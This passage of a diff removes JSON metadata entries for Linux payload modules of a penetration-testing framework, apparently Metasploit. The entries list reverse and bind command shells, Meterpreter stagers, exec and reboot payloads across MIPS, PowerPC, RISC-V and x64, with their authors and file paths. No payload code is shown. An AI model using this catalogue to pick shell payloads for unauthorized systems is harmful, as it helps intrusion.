"mipsle", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/mipsle/shell_bind_tcp.rb", - "is_install_path": true, - "ref_name": "linux/mipsle/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/mipsle/shell_reverse_tcp": { - "name": "Linux Command Shell, Reverse TCP Inline", - "fullname": "payload/linux/mipsle/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "rigan ", - "juan vazquez " - ], - "description": "Connect back to attacker and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "mipsle", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "linux/mipsle/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/ppc/meterpreter_reverse_http": { - "name": "Linux Meterpreter, Reverse HTTP Inline", - "fullname": "payload/linux/ppc/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Linux", - "arch": "ppc", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb", - "is_install_path": true, - "ref_name": "linux/ppc/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/ppc/meterpreter_reverse_https": { - "name": "Linux Meterpreter, Reverse HTTPS Inline", - "fullname": "payload/linux/ppc/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Linux", - "arch": "ppc", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb", - "is_install_path": true, - "ref_name": "linux/ppc/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/ppc/meterpreter_reverse_tcp": { - "name": "Linux Meterpreter, Reverse TCP Inline", - "fullname": "payload/linux/ppc/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Linux", - "arch": "ppc", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "linux/ppc/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/ppc/shell_bind_tcp": { - "name": "Linux Command Shell, Bind TCP Inline", - "fullname": "payload/linux/ppc/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Ramon de C Valle " - ], - "description": "Listen for a connection and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "ppc, cbea", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/ppc/shell_bind_tcp.rb", - "is_install_path": true, - "ref_name": "linux/ppc/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/ppc/shell_find_port": { - "name": "Linux Command Shell, Find Port Inline", - "fullname": "payload/linux/ppc/shell_find_port", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Ramon de C Valle " - ], - "description": "Spawn a shell on an established connection", - "references": [], - "platform": "Linux", - "arch": "ppc, cbea", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/ppc/shell_find_port.rb", - "is_install_path": true, - "ref_name": "linux/ppc/shell_find_port", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/ppc/shell_reverse_tcp": { - "name": "Linux Command Shell, Reverse TCP Inline", - "fullname": "payload/linux/ppc/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Ramon de C Valle " - ], - "description": "Connect back to attacker and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "ppc, cbea", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/ppc/shell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "linux/ppc/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/ppc64/shell_bind_tcp": { - "name": "Linux Command Shell, Bind TCP Inline", - "fullname": "payload/linux/ppc64/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Ramon de C Valle " - ], - "description": "Listen for a connection and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "ppc64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/ppc64/shell_bind_tcp.rb", - "is_install_path": true, - "ref_name": "linux/ppc64/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/ppc64/shell_find_port": { - "name": "Linux Command Shell, Find Port Inline", - "fullname": "payload/linux/ppc64/shell_find_port", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Ramon de C Valle " - ], - "description": "Spawn a shell on an established connection", - "references": [], - "platform": "Linux", - "arch": "ppc64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/ppc64/shell_find_port.rb", - "is_install_path": true, - "ref_name": "linux/ppc64/shell_find_port", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/ppc64/shell_reverse_tcp": { - "name": "Linux Command Shell, Reverse TCP Inline", - "fullname": "payload/linux/ppc64/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Ramon de C Valle " - ], - "description": "Connect back to attacker and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "ppc64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/ppc64/shell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "linux/ppc64/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/ppc64le/meterpreter_reverse_http": { - "name": "Linux Meterpreter, Reverse HTTP Inline", - "fullname": "payload/linux/ppc64le/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Linux", - "arch": "ppc64le", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb", - "is_install_path": true, - "ref_name": "linux/ppc64le/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/ppc64le/meterpreter_reverse_https": { - "name": "Linux Meterpreter, Reverse HTTPS Inline", - "fullname": "payload/linux/ppc64le/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Linux", - "arch": "ppc64le", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb", - "is_install_path": true, - "ref_name": "linux/ppc64le/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/ppc64le/meterpreter_reverse_tcp": { - "name": "Linux Meterpreter, Reverse TCP Inline", - "fullname": "payload/linux/ppc64le/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Linux", - "arch": "ppc64le", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "linux/ppc64le/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/ppce500v2/meterpreter_reverse_http": { - "name": "Linux Meterpreter, Reverse HTTP Inline", - "fullname": "payload/linux/ppce500v2/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Linux", - "arch": "ppce500v2", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_http.rb", - "is_install_path": true, - "ref_name": "linux/ppce500v2/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/ppce500v2/meterpreter_reverse_https": { - "name": "Linux Meterpreter, Reverse HTTPS Inline", - "fullname": "payload/linux/ppce500v2/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Linux", - "arch": "ppce500v2", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_https.rb", - "is_install_path": true, - "ref_name": "linux/ppce500v2/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/ppce500v2/meterpreter_reverse_tcp": { - "name": "Linux Meterpreter, Reverse TCP Inline", - "fullname": "payload/linux/ppce500v2/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Linux", - "arch": "ppce500v2", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "linux/ppce500v2/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/riscv32le/exec": { - "name": "Linux Execute Command", - "fullname": "payload/linux/riscv32le/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "modexp", - "bcoles " - ], - "description": "Execute an arbitrary command", - "references": [ - "URL-https://modexp.wordpress.com/2022/05/02/shellcode-risc-v-linux/", - "URL-https://github.com/odzhan/shellcode/blob/master/os/linux/riscv64/cmd.s" - ], - "platform": "Linux", - "arch": "riscv32le", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-14 09:31:03 +0000", - "path": "/modules/payloads/singles/linux/riscv32le/exec.rb", - "is_install_path": true, - "ref_name": "linux/riscv32le/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/riscv32le/reboot": { - "name": "Linux Reboot", - "fullname": "payload/linux/riscv32le/reboot", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bcoles " - ], - "description": "A very small shellcode for rebooting the system using\n the reboot syscall. This payload is sometimes helpful\n for testing purposes.", - "references": [], - "platform": "Linux", - "arch": "riscv32le", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-14 09:31:03 +0000", - "path": "/modules/payloads/singles/linux/riscv32le/reboot.rb", - "is_install_path": true, - "ref_name": "linux/riscv32le/reboot", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/riscv64le/exec": { - "name": "Linux Execute Command", - "fullname": "payload/linux/riscv64le/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "modexp", - "bcoles " - ], - "description": "Execute an arbitrary command", - "references": [ - "URL-https://modexp.wordpress.com/2022/05/02/shellcode-risc-v-linux/", - "URL-https://github.com/odzhan/shellcode/blob/master/os/linux/riscv64/cmd.s" - ], - "platform": "Linux", - "arch": "riscv64le", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-14 09:31:03 +0000", - "path": "/modules/payloads/singles/linux/riscv64le/exec.rb", - "is_install_path": true, - "ref_name": "linux/riscv64le/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/riscv64le/reboot": { - "name": "Linux Reboot", - "fullname": "payload/linux/riscv64le/reboot", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bcoles " - ], - "description": "A very small shellcode for rebooting the system using\n the reboot syscall. This payload is sometimes helpful\n for testing purposes.", - "references": [], - "platform": "Linux", - "arch": "riscv64le", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-14 09:31:03 +0000", - "path": "/modules/payloads/singles/linux/riscv64le/reboot.rb", - "is_install_path": true, - "ref_name": "linux/riscv64le/reboot", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/x64/exec": { - "name": "Linux Execute Command", - "fullname": "payload/linux/x64/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ricky", - "Geyslan G. Bem " - ], - "description": "Execute an arbitrary command or just a /bin/sh shell", - "references": [], - "platform": "Linux", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/x64/exec.rb", - "is_install_path": true, - "ref_name": "linux/x64/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/x64/meterpreter/bind_tcp": { - "name": "Linux Mettle x64, Bind TCP Stager", - "fullname": "payload/linux/x64/meterpreter/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brent Cook ", - "ricky" - ], - "description": "Inject the mettle server payload (staged).\n\nListen for a connection", - "references": [], - "platform": "Linux,Linux", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/linux/x64/bind_tcp.rb", - "is_install_path": true, - "ref_name": "linux/x64/meterpreter/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "linux/x64/meterpreter", - "stager_refname": "linux/x64/bind_tcp" - }, - "payload_linux/x64/meterpreter/reverse_sctp": { - "name": "Linux Mettle x64, Reverse SCTP Stager", - "fullname": "payload/linux/x64/meterpreter/reverse_sctp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brent Cook ", - "RageLtMan " - ], - "description": "Inject the mettle server payload (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Linux,Linux", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-12-20 04:15:41 +0000", - "path": "/modules/payloads/stagers/linux/x64/reverse_sctp.rb", - "is_install_path": true, - "ref_name": "linux/x64/meterpreter/reverse_sctp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "linux/x64/meterpreter", - "stager_refname": "linux/x64/reverse_sctp" - }, - "payload_linux/x64/meterpreter/reverse_tcp": { - "name": "Linux Mettle x64, Reverse TCP Stager", - "fullname": "payload/linux/x64/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brent Cook ", - "ricky", - "tkmru" - ], - "description": "Inject the mettle server payload (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Linux,Linux", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/linux/x64/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "linux/x64/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "linux/x64/meterpreter", - "stager_refname": "linux/x64/reverse_tcp" - }, - "payload_linux/x64/meterpreter_reverse_http": { - "name": "Linux Meterpreter, Reverse HTTP Inline", - "fullname": "payload/linux/x64/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Linux", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb", - "is_install_path": true, - "ref_name": "linux/x64/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/x64/meterpreter_reverse_https": { - "name": "Linux Meterpreter, Reverse HTTPS Inline", - "fullname": "payload/linux/x64/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Linux", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb", - "is_install_path": true, - "ref_name": "linux/x64/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/x64/meterpreter_reverse_tcp": { - "name": "Linux Meterpreter, Reverse TCP Inline", - "fullname": "payload/linux/x64/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Run the Meterpreter / Mettle server payload (stageless)", - "references": [], - "platform": "Linux", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "linux/x64/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/x64/pingback_bind_tcp": { - "name": "Linux x64 Pingback, Bind TCP Inline", - "fullname": "payload/linux/x64/pingback_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7" - ], - "description": "Accept a connection from attacker and report UUID (Linux x64)", - "references": [], - "platform": "Linux", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/x64/pingback_bind_tcp.rb", - "is_install_path": true, - "ref_name": "linux/x64/pingback_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/x64/pingback_reverse_tcp": { - "name": "Linux x64 Pingback, Reverse TCP Inline", - "fullname": "payload/linux/x64/pingback_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7" - ], - "description": "Connect back to attacker and report UUID (Linux x64)", - "references": [], - "platform": "Linux", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/x64/pingback_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "linux/x64/pingback_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/x64/shell/bind_tcp": { - "name": "Linux Command Shell, Bind TCP Stager", - "fullname": "payload/linux/x64/shell/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ricky" - ], - "description": "Spawn a command shell (staged).\n\nListen for a connection", - "references": [], - "platform": "Linux", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/linux/x64/bind_tcp.rb", - "is_install_path": true, - "ref_name": "linux/x64/shell/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "linux/x64/shell", - "stager_refname": "linux/x64/bind_tcp" - }, - "payload_linux/x64/shell/reverse_sctp": { - "name": "Linux Command Shell, Reverse SCTP Stager", - "fullname": "payload/linux/x64/shell/reverse_sctp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ricky", - "RageLtMan " - ], - "description": "Spawn a command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-12-20 04:15:41 +0000", - "path": "/modules/payloads/stagers/linux/x64/reverse_sctp.rb", - "is_install_path": true, - "ref_name": "linux/x64/shell/reverse_sctp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "linux/x64/shell", - "stager_refname": "linux/x64/reverse_sctp" - }, - "payload_linux/x64/shell/reverse_tcp": { - "name": "Linux Command Shell, Reverse TCP Stager", - "fullname": "payload/linux/x64/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ricky", - "tkmru" - ], - "description": "Spawn a command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/linux/x64/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "linux/x64/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "linux/x64/shell", - "stager_refname": "linux/x64/reverse_tcp" - }, - "payload_linux/x64/shell_bind_ipv6_tcp": { - "name": "Linux x64 Command Shell, Bind TCP Inline (IPv6)", - "fullname": "payload/linux/x64/shell_bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "epi " - ], - "description": "Listen for an IPv6 connection and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/x64/shell_bind_ipv6_tcp.rb", - "is_install_path": true, - "ref_name": "linux/x64/shell_bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/x64/shell_bind_tcp": { - "name": "Linux Command Shell, Bind TCP Inline", - "fullname": "payload/linux/x64/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "ricky" - ], - "description": "Listen for a connection and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/x64/shell_bind_tcp.rb", - "is_install_path": true, - "ref_name": "linux/x64/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/x64/shell_bind_tcp_random_port": { - "name": "Linux Command Shell, Bind TCP Random Port Inline", - "fullname": "payload/linux/x64/shell_bind_tcp_random_port", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Geyslan G. Bem " - ], - "description": "Listen for a connection in a random port and spawn a command shell.\n Use nmap to discover the open port: 'nmap -sS target -p-'.", - "references": [ - "URL-https://github.com/geyslan/SLAE/blob/master/improvements/tiny_shell_bind_tcp_random_port_x86_64.asm" - ], - "platform": "Linux", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/x64/shell_bind_tcp_random_port.rb", - "is_install_path": true, - "ref_name": "linux/x64/shell_bind_tcp_random_port", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_linux/x64/shell_find_port": { - "name": "Linux Command Shell, Find Port Inline", - "fullname": "payload/linux/x64/shell_find_port", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "mak" - ], - "description": "Spawn a shell on an established connection", - "references": [], - "platform": "Linux", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/linux/x64/shell_find_port.rb", - "is_install_path": true, - "ref_name": "linux/x64/shell_find_port", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - 